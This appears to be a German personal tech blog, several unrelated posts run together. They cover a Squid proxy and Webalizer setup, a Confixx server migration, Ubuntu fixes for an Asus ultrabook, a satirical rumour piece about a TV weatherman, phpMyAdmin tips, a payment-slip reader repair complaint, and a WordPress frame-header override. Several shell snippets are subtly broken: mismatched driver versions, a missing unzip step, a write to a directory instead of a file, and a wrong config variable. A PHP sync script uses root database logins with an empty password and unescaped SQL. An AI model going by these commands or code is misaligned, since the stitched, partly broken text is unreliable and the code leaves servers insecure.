echo 'GroupSite *.youtube.com' >> webalizer-squid3.conf
echo 'GroupSite *.swissquote.ch' >> webalizer-squid3.conf
echo 'GroupDomains 1' >> webalizer-squid3.conf
echo 'GroupShading yes' >> webalizer-squid3.conf
echo 'IgnoreSite localhost' >> webalizer-squid3.conf
echo 'IgnoreReferrer localhost' >> webalizer-squid3.conf
echo 'SearchEngine yahoo.com p=' >> webalizer-squid3.conf
echo 'SearchEngine altavista.com q=' >> webalizer-squid3.conf
echo 'SearchEngine google.com q=' >> webalizer-squid3.conf
echo 'SearchEngine eureka.com q=' >> webalizer-squid3.conf
echo 'SearchEngine lycos.com query=' >> webalizer-squid3.conf
echo 'SearchEngine hotbot.com MT=' >> webalizer-squid3.conf
echo 'SearchEngine msn.com MT=' >> webalizer-squid3.conf
echo 'SearchEngine infoseek.com qt=' >> webalizer-squid3.conf
echo 'SearchEngine webcrawler searchText=' >> webalizer-squid3.conf
echo 'SearchEngine excite search=' >> webalizer-squid3.conf
echo 'SearchEngine netscape.com search=' >> webalizer-squid3.conf
echo 'SearchEngine mamma.com query=' >> webalizer-squid3.conf
echo 'SearchEngine alltheweb.com query=' >> webalizer-squid3.conf
echo 'SearchEngine northernlight.com qr=' >> webalizer-squid3.conf
echo 'SearchEngine sensis.com.au find=' >> webalizer-squid3.conf
echo 'SearchEngine google.nl q=' >> webalizer-squid3.conf
echo 'SearchEngine google.fr q=' >> webalizer-squid3.conf
echo 'SearchEngine google.ch q=' >> webalizer-squid3.conf
echo 'SearchEngine google.ca q=' >> webalizer-squid3.conf
echo 'SearchEngine google.be q=' >> webalizer-squid3.conf

Diese Zeile hier muss auf die eigenen Gegebenheiten angepasst werden. Und zwar muss man hier das Webverzeichnis angeben, wo die Statistiken abgelegt werden sollten. Dieses sollte natürlich nicht schon eine Webseite beinhalten, sonst würde es überschrieben werden

echo 'OutputDir /var/www/murawski.ch/www/statistik/' >> webalizer-squid3.conf

Und nun aktivieren wir den Cronjob welcher automatisch die Statistiken aktualisiert mit:

cd /opt
crontab -l > crontab.tmp
echo '' >> crontab.tmp
echo '24 0,6,8,10,12,14,16,18,20,22 * * * /usr/bin/webalizer -c /etc/webalizer/webalizer-squid3.conf > /dev/null 2>&1' >> crontab.tmp
crontab crontab.tmp
rm crontab.tmp

Nun kann man beim SSL-Explorer einloggen und unter “Configuration -> Server -> Proxy” noch den Host auf “localhost” und den Port auf “3128″ einstellen und das Ganze ist eingerichtet.

Abschluss

Man kann nun per Webpanel einen SSL Tunnel auf den eigenen Server starten und von dort aus diesen Proxy als Sprungbrett für Alles nehmen.

Wie auch bei der alten Anleitung, ist dies keine Anleitung um Firmenfirewalls zu umgehen und darf auch nicht ohne Zustimmung dafür genutzt werden!

Danksagung

Auch ein herzliches Dankeschön geht an Silvan vom Roo1024 Blog wo meine Anleitung durchgearbeitet, kontrolliert und verbessert hat, weil ich einfach zu wenig Zeit hatte.
Besucht unbedingt auch seinen Blog, denn auch er hat immer wieder sehr interessante Artikel rund um den IT Bereich.

Die Anleitung ist eigentlich sehr einfach und man findet diese auch überall im Internet.

Jedoch synchronisiert Confixx auch wirklich nur was 1:1 über Confixx erstellt wurde mit ein paar wichtigen Ausnahmen.

Auch ich habe mich an die Anleitung gehalten und einfach mal ein Verzeichnis für das Backup erstellt:

cd /root
rm -R confixxdump
mkdir /root/confixxdump

und anschliessend das Backup gestartet:

cd /root/confixx
./backup.pl –dump /root/confixxdump/dump

Danach kann man die Backups auf den neuen Server zügeln mit SCP, z.B. mit:

scp -r ../confixxdump root@nmeuerserver:/storage/

Auf dem neuen Server kann man danach die folgenden Befehle starten:

cd /root/confixx/
rm restore.txt
./restore.pl –mapping –dump /storage/confixxdump/dump.tgz –map restore.txt –clean

Nun wurde ein restore.txt angelegt, was man bearbeiten sollte.
Darin muss man die neuen Server IP Adressen austauschen und gegebenenfalls die Domains anpassen.

Ist alles gemacht, kann der Restore mit:

./restore.pl –restore –dump /storage/confixxdump/dump.tgz –map restore.txt –clean –debug

angeworfen werden.

Soweit die Anleitung und dies funktioniert auch gut.

Nun die Ausnahme, hatte man irgendwelche spezifischen Einstellungen zu Kunden vorgenommen, sind diese im Nirvana.
Dies beinhaltet DNS, HTTP & PHP Optionen.

Ich hab mir dazu kurz ein PHP File geschrieben wo die HTTP und PHP Optionen synchronisiert.

<?php

$pass = '';
$db = mysql_connect('localhost','root',$pass) or die(mysql_error());
mysql_select_db('confixx',$db);

$db2 = mysql_connect('neuerserver','root2',$pass) or die(mysql_error());
mysql_select_db('confixx',$db2);

$abfrage = mysql_query("SELECT d.domain,e.* FROM httpd_entries as e LEFT JOIN domains as d ON d.id=e.domain_id WHERE d.domain!=''  AND d.domain NOT LIKE 'web%.%'",$db);
while($row = mysql_fetch_assoc($abfrage)) {
	echo "<b>".$row[domain]."</b>: ".$row[domain_id]."=&gt;";

	$abf = mysql_query("SELECT `id`,`server_id` FROM domains WHERE domain='".$row[domain]."' LIMIT 1",$db2);
	$dbid = mysql_result($abf,0,"id");
	$sid = mysql_result($abf,0,"server_id");
	echo $dbid."<br/>";

	$einspeichern = "REPLACE INTO `httpd_entries` VALUES ('".$row['id']."','".$row['httpd_id']."','".$row['reseller']."','".$row['user']."','".$row['type']."','".$dbid."','".$row['state']."','".$sid."');";
	mysql_query($einspeichern,$db2);
}

?>

Dieses kopiert man auf den Quell Server und schaltet die MySQL Verbindung auf (skip-networking deaktivieren) und synchronisiert.

Einzig und alleine bleiben noch die DNS Einstellungen manuell zu übernehmen und danach funktioniert der komplette Server ohne Probleme.

Das OS erkennt leider nicht gleich die ganze Hardware vom Anfang an und da muss man ein wenig nachhelfen.

Ethernet USB-LAN Adapter
Dieser wird komplett nicht erkennt und daher sollte man den dazugehörigen Treiber herunterladen. Dazu gibt man in der Shell folgenden Befehl ein:

wget http://www.asix.com.tw/FrootAttach/driver/AX88772B_772A_760_772_178_LINUX_Driver_v4.2.0_Source.zip
cd AX88772B_772A_760_772_178_LINUX_Driver_v4.1.0_Source
make
sudo make install
sudo modprobe asix
echo "asix" >> /etc/modules

Anschliessend wurde der richtige Treiber installiert und aktiviert.

WLAN Adapter
Der WLAN Adapter wird zwar erkennt, ist aber beim normalen Systemstart mit einem Softlock versehen. Um diesen zu entfernen sind diese Befehle nötig:

sudo modprobe -r acer-wmi
cd /etc/modprobe.d
echo "blacklist acer-wmi" >> blacklist.conf
echo "rfkill unlock all" >> /root.profile
rfkill unlock all


Nun ist der Softlock entfernt und das WLAN ist auf wlan0 verfügbar.

Sleep / Hibernate Mode
Leider hängt sich der Laptop dann beim Sleep und Hibernate auch noch auf. Dies hat mit den USB3 Treibern zu tun. Beim Aktivieren, schaltet sich zudem auch der Bildschirm nicht mehr richtig ein. Um das zu beheben sind folgende Befehle notwendig:

touch /etc/pm/sleep.d/95usbscreen
echo 'EHCI_BUSES="0000:00:1a.0 0000:00:1d.0"' >> /etc/pm/sleep.d/95usbscreen
echo 'case "${1}" in' >> /etc/pm/sleep.d/95usbscreen
echo ' hibernate|suspend)' >> /etc/pm/sleep.d/95usbscreen
echo ' # Switch USB buses off' >> /etc/pm/sleep.d/95usbscreen
echo ' for bus in $EHCI_BUSES; do' >> /etc/pm/sleep.d/95usbscreen
echo ' echo -n $bus > /sys/bus/pci/drivers/ehci_hcd/unbind' >> /etc/pm/sleep.d/95usbscreen
echo ' done' >> /etc/pm/sleep.d/95usbscreen
echo ' ;;' >> /etc/pm/sleep.d/95usbscreen
echo ' resume|thaw)' >> /etc/pm/sleep.d/95usbscreen
echo ' # Switch USB buses back on' >> /etc/pm/sleep.d/95usbscreen
echo ' for bus in $EHCI_BUSES; do' >> /etc/pm/sleep.d/95usbscreen
echo ' echo -n $bus > /sys/bus/pci/drivers/ehci_hcd/bind' >> /etc/pm/sleep.d/95usbscreen
echo ' done' >> /etc/pm/sleep.d/95usbscreen
echo '' >> /etc/pm/sleep.d/95usbscreen
echo ' echo -n 0x90 0x80 > /sys/devices/platform/i8042/serio4/setreg' >> /etc/pm/sleep.d/95usbscreen
echo ' echo -n c > /sys/devices/platform/i8042/serio4/flags' >> /etc/pm/sleep.d/95usbscreen
echo ' # Hacky workaround to fix display after suspend' >> /etc/pm/sleep.d/95usbscreen
echo ' export DISPLAY=":0"' >> /etc/pm/sleep.d/95usbscreen
echo ' export XAUTHORITY="/root/.Xauthority"' >> /etc/pm/sleep.d/95usbscreen
echo ' xset dpms force off' >> /etc/pm/sleep.d/95usbscreen
echo ' xset dpms force on' >> /etc/pm/sleep.d/95usbscreen
echo ' ;;' >> /etc/pm/sleep.d/95usbscreen
echo 'esac' >> /etc/pm/sleep.d/
chmod +x /etc/pm/sleep.d/95usbscreen

Autostart von KDE
Wer möchte das sich das KDE automatisch startet, kann noch folgende Befehle ausführen:

echo 'if [ -z "$DISPLAY" ] && [ $(tty) == /dev/tty1 ] ; then]' >> .profile
echo " startx" >> .profile
echo "fi" >> .profile

Nun startet das KDE automatisch beim Systemstart.

Touchpad, Grafik & Musik
Diese Treiber funktionieren auf Anhieb und keinerlei Modifikationen müssen gemacht werden.

Da die Batterielaufzeit sehr wichtig ist bei einem Laptop nehmen wir auch da noch diverse Anpassungen vor.
Damit Strom gespart werden kann, werden wir diverse Dinge anpassen, dafür installieren wir zuerst die Tools dazu:

sudo apt-get install laptop-mode-tools -y
echo 'MODULES="all"' >> /etc/default/acpid

Damit USB3 schlafen geht wenn es unbenutzt ist:

replace 'CONTROL_USB_AUTOSUSPEND=0' 'CONTROL_USB_AUTOSUSPEND=1' -- /etc/laptop-mode/conf.d/usb-autosuspend.conf
replace 'LM_AC_SUSPEND_USB=0' 'LM_AC_SUSPEND_USB=1' -- /etc/laptop-mode/conf.d/usb-autosuspend.conf

Der SATA Controller:

replace 'CONTROL_INTEL_SATA_POWER=0' 'CONTROL_USB_AUTOSUSPEND=1' -- /etc/laptop-mode/conf.d/intel-sata-powermgmt.conf
echo 'BATT_ACTIVATE_SATA_POWER=1' >> /etc/laptop-mode/conf.d/intel-sata-powermgmt.conf
echo 'LM_AC_ACTIVATE_SATA_POWER=1' >> /etc/laptop-mode/conf.d/intel-sata-powermgmt.conf
echo 'NOLM_AC_ACTIVATE_SATA_POWER=0' >> /etc/laptop-mode/conf.d/intel-sata-powermgmt.conf

LCD Helligkeit:

replace 'CONTROL_BRIGHTNESS=0' 'CONTROL_BRIGHTNESS=1' -- /etc/laptop-mode/conf.d/lcd-brightness.conf
replace 'BATT_BRIGHTNESS_COMMAND="echo [value]"' 'BATT_BRIGHTNESS_COMMAND="echo 4"' -- /etc/laptop-mode/conf.d/lcd-brightness.conf
replace 'LM_AC_BRIGHTNESS_COMMAND="echo [value]"' 'LM_AC_BRIGHTNESS_COMMAND="echo 10"' -- /etc/laptop-mode/conf.d/lcd-brightness.conf
replace 'NOLM_AC_BRIGHTNESS_COMMAND="echo [value]"' 'NOLM_AC_BRIGHTNESS_COMMAND="echo 10"' -- /etc/laptop-mode/conf.d/lcd-brightness.conf
replace 'BRIGHTNESS_OUTPUT="/proc/acpi/video/VID/LCD/brightness"' 'BRIGHTNESS_OUTPUT="/sys/class/backlight/acpi_video0/brightness"' -- /etc/laptop-mode/conf.d/lcd-brightness.conf

CPU Frequenz Anpassung
Damit die CPU nicht immer auf voller Leistung läuft, sondern sich je nach Systemlast selber anpasst (Stromsparend) sollte man noch das dazugehörige Modul installieren und aktivieren:

sudo apt-get install cpufrequtils
sudo modprobe acpi-cpufreq
sudo modprobe cpufreq_ondemand
echo "acpi-cpufreq" >> /etc/modules
echo "cpufreq_ondemand" >> /etc/modules
replace 'CONTROL_CPU_FREQUENCY=0' 'CONTROL_CPU_FREQUENCY=1' -- /etc/laptop-mode/conf.d/cpufreq.conf

Audio:

replace 'CONTROL_AC97_POWER=0' 'CONTROL_AC97_POWER=1' -- /etc/laptop-mode/conf.d/ac97-powersave.conf

Und noch ein Fix, damit wir uns mit dem PM-Util nicht in den Weg kommen:

touch /etc/pm/config.d/laptop-mode-tools
echo 'HOOK_BLACKLIST="laptop-mode"' >> /etc/pm/config.d/laptop-mode-tools

Selbstverständlich sollte das Gleiche auch mit dem kleineren Bruder dem UX21 gehen, aber ist ungetestet.

Dieser Reifenhandel wirft natürlich viele Fragen auf. Hat Buchelis Frau vom bevorstehenden Schneefall gewusst? Hat Thomas Bucheli selbst den Reifendeal eingefädelt? Wer hat alles von der ganzen Sache profitiert? Eins ist auf jeden Fall klar, die Sache stinkt zum Himmel und der Bucheli hat offensichtlich seine Frau nicht unter Kontrolle!!!

Höchst pikant ist auch die Tatsache, dass der Informant (ein Hilfsarbeiter desPneuhauses) mit seinen Beweisen zuerst zum obersten Muotathaler Wetterschmöker Hans-Heiri Tresch (ein seit Jahren vehementer Kritiker Buchelis) ging, und dieser wiederum spielte die “Reifenakte” der “Weltwoche” und danach Roger de Weck zu. Was wiederum die Schlussfolgerung zulässt, dass sich Hans-Heiri Tresch den Moderationsposten auf dem Dach des Studios Leutschenbach unter den Nagel reissen will. Da Tresch im Moment “in der Zeit des Schweigens” ist, war von ihm keine Stellungnahme zu erhalten. Thomas Bucheli seinerseits weist jedoch alle gegen ihn erhobenen Vorwürfe vehement zurück.

Eine Blitz-Umfrage von 20Minuten Online hat übrigens ergeben, dass 98% der Userinnen und User nicht wissen, wer Thomas Bucheli ist, was Roger de Weck wiederum auf die sinkenden Einschaltquoten zurückführte.

Und zum Schluss noch meine persönliche Wettervorhersage: Am Abend ist mit aufkommender Dunkelheit zu rechnen….. gegen Morgen wird’s dann aber wieder heller.

Ich wünsche noch viel Spass bei anderen Artikeln.

Vorne weg ohne Jedem Angst zu machen. Die Überschwemmungen in Thailand haben auf dem SSD Markt ein riesiger Schaden hinterlassen. Aus dem Grund kaufen aktuell alle Hersteller die SSD Festplatten zusammen.

Die verbauten 128GB AData Sandforce SSD Platten sind recht schnell und leistungsfähig. Die verbauten 256 GB Festplatten von Sandisk hingegen sind lahme Schnecken im Vergleich.

Der i7 tut wiederum seinen Dienst und man hat genügend Performance.

Das Ultrabook kommt mit einem vorinstallierten Windows 7 daher. Da dies von Asus erstellt wurde, finden sich darauf erstmals eine Handvoll unnützlicher Spiele und Anwendungen vor die man deinstallieren sollte. Dabei geht schonmal eine Stunde den Bach runter.

Weiterhin ist auch die BingBar installiert, wo man beim Setup zustimmen muss. Naja, dafür hat man das Ultrabook 100 CHF Billiger erhalten (MS zahlt dafür) und das deinstalliert man sich auch gleich. Dafür nehm ich mir die 5 Minuten gerne.

Wie immer ist das Windows längst veraltet und man macht sich auf zu einem Update Marathon über mehrere Stunden.

Ist alles erledigt, bemerkt man gegebenenfalls, dass die FN Tasten nicht mehr funktionieren.
FN + F2 steuert WLAN und Bluetooth, auch FN + F9-12 sind ausser Funktion.

Kurz gesagt, der ATK Manager darauf ist zwar installiert, tut aber nicht was er sollte.

Diesen kann man sich bei Asus.de herunterladen:

Beim Starten fragt er nach ob man die Installation reparieren oder entfernen möchte. Unbedingt Entfernen!
Danach Rebooten. (PS: Sollte der Reboot nicht gehen, abwürgen). Erst nach dem Reboot neu installieren und hier nochmals Rebooten (sollte nun gehen).

Ist dies erledigt, funktioniert der ATK Manager endlich zufriedenstellend und die FN Tasten damit auch.

Trotz der Problemchen, bin ich sehr zufrieden mit dem Gerät und kann es nur empfehlen.

In allen Versionen inkl. 3.4.8 ist ein Sicherheitsloch, womit man Domain übergreifend ohne Password in die Datenbanken kommt. Ein recht happiger XSS Fix dem Fall.

Der Bug wurde am 7. Dezember entdeckt und bereits am 21. Dezember geschlossen. Aus diesem Grund wurde auch bereits das Proof of Concept am 22. Dezember publiziert, womit diverse Genossen den Bug auf noch nicht aktualisierten Versionen ausnutzen könnten.

Aus dem Grund ist ein Update erst recht ans Herz gelegt!

Weiterhin möchte ich hier noch 2 sehr kleine Tipps zum Besten geben. PhpMyAdmin hat neuerdings noch “neue Funktionen” welche man gegebenenfalls nicht nutzen möchte. Leider erscheint dann aber immer folgende Meldung:

Der phpMyAdmin-Konfigurationsspeicher ist nicht vollständig konfiguriert, einige erweiterte Funktionen wurden deaktiviert. Klicken Sie hier, um herauszufinden warum.

Dazu öffnet man einfach die main.php im PhpMyAdmin Verzeichnis und geht zur Zeile 298:

if ($server > 0) {

Diese ändert man in:

if ($server > 0 AND 1 == 2) {

Und schon ist die Meldung weg.

Auch gibt es noch die Meldung:

Der Server läuft mit Suhosin. Bitte lesen Sie die Dokumentation wegen möglicher Probleme.

Falls keine Loginprobleme auftreten, die Meldung einfach im Config.inc.php ausblenden mit folgendem Eintrag:

$cfg['SuhosinDisableWarning'] = true;

Ein kleinerer Fehler den gewisse Personen noch sehen:

Ab sofort muss ein geheimes Passwort zur Verschlüsselung inder Konfigurationsdatei gesetzt werden (blowfish_secret).

Wer mit dem Debian Packet gearbeitet hat (z.B. nach Confixx Anleitung), sollte dieses Mal manuell Updaten!

Immer daran denken die Programme zu updaten, denn dies ist sehr Wichtig!

Der ist so genial, das ich ihn online stellen musste.
Quelle PC Tipp

Denn legte man eine Quittung ein und drückte die Fehlermeldung weg, zog er wieder eine Einzahlungsschein durch und erfasste die Nummer, meldete danach aber wieder Papierstau.

Da ich gelernter Elektroniker bin und mich mit Strom auskenne, habe ich das Problem recht schnell eruiert und auch auf den einen Lichtsensor zurückverfolgt.
Sobald ich eine externe Lichtquelle an den Sensor hielt, war kein Papierstau mehr da und Alles funktionierte normal.

Da ich keine UV-Lichtquelle zur Hand hatte, habe ich den Giromat 130 zur Reparatur an den Hersteller Crealogix eingeschickt mit folgendem Hinweis:

Beim Giromat fehlt der vordere Einzug, weiterhin ist die erste Lichtschranke defekt und versucht daher immer Papier einzuziehen (meint irgendwas ist zwischen der Schranke) und meldet Stau.

Können sie mir gerne einen Kostenvoranschlag auf xxx unterbreiten?

Ich habe dann auch relativ bald eine Rückantwort erhalten:

Wir haben Ihren Giromat erhalten und geprüft.

Leider müssen wir Ihnen mitteilen, dass das Gerät einen grösseren Defekt aufweist. Der Lesekopf ist defekt und lässt sich nicht mehr kalibrieren. Der Papierstau wegen der defekten Lichtschranke ist zurückzuführen auf einen Wackelkontakt im Mainboard.

Da eine Reparatur teuer wäre, würden wir Ihnen vorab vorschlagen, auf ein neues Gerät zu wechseln. Dieses würden wir Ihnen für CHF 1298.- anstatt CHF 1498.- anbieten im Falle, dass Sie sich für das Gerät CLX.G130 entscheiden würden. Bei einem Wechsel auf das Gerät CLX.G75+ offerieren wir Ihnen CHF 898.- anstatt CHF 998.- (bei diesem Gerät bitte Kreditorensoftware angeben).

Wenn Sie dies wünschen, können wir Ihnen die konkreten Reparaturkosten auflisten, wenn Sie dies mit dem Austauschpreis vergleichen möchten.

Ich wollte das Gerät unrepariert zurück, was auch geschah. Ein kurzer Test, jawohl das Problem war immer noch vorhanden.

Ich habe das Gerät nochmals aufgemacht und gesehen das der Mitarbeiter scheinbar alle Lötstellen der Lichtschranken nachgelötet habt, dennoch war der Wackelkontakt scheinbar noch vorhanden von welchem gesprochen wurde.
Da die Schranke mit einer externen Lichtquelle funktionierte, meinte ich, dass die UV-Lichtquelle defekt ist. Dies war aber nicht der Fall, wie ich feststellte. Über dem Sender und Empfänger ist ein Plastikgehäuse welches das Licht umleitet (siehe Bild Rechts) welcher ich zuerst abmontierte und darunter entdeckt das der Sender und Empänger leicht schräge montiert waren. Diese habe ich gerade gebogen und die Plastikhülle (Lichtleiter) wieder montiert. Das war es dann auch und unterdessen funktioniert das Gerät wieder und erkennt alle möglichen Einzahlungsscheine.

Wenn ein unjustierter Lesekopf dennoch alle Einzahlungsscheine liest dann frage ich mich wozu die Justierung ist. Ich denke man möchte dem Kunden das Gerät als “unreparierbar” hinstellen und ihn so abzocken.
An einem Neugerät verdient man wesentlich mehr als an einer Reparatur.

Ich sage, Abzocke und eine Frechheit!

Dies hat zur Folge, dass WordPress nicht mehr in iFrames geladen werden kann.

Da ich ein Updateskript geschrieben habe, was vollautomatisch alle WordPress Installationen per iFrames update, habe ich seither ein Problem.

Zuerst habe ich den Filter von WordPress mit folgendem Plugincode entfernt:

remove_action( 'login_init', 'send_frame_options_header');
remove_action( 'admin_init', 'send_frame_options_header');

Als Nächstes habe ich meine eigene Funktion hinzugefügt:

function wuk_send_frame_options_header() {
	@header( 'X-Frame-Options: SAMEORIGIN, ALLOW-FROM http://wuk.ch' );
}
add_action( 'login_init', 'wuk_send_frame_options_header', 10, 0 );
add_action( 'admin_init', 'wuk_send_frame_options_header', 10, 0 );

Und schon wird der HTTP Header so modifiziert das iFrames von der angegebenen Webseite erlaubt sind, aber dennoch alle anderen Domains weiterhin verboten sind.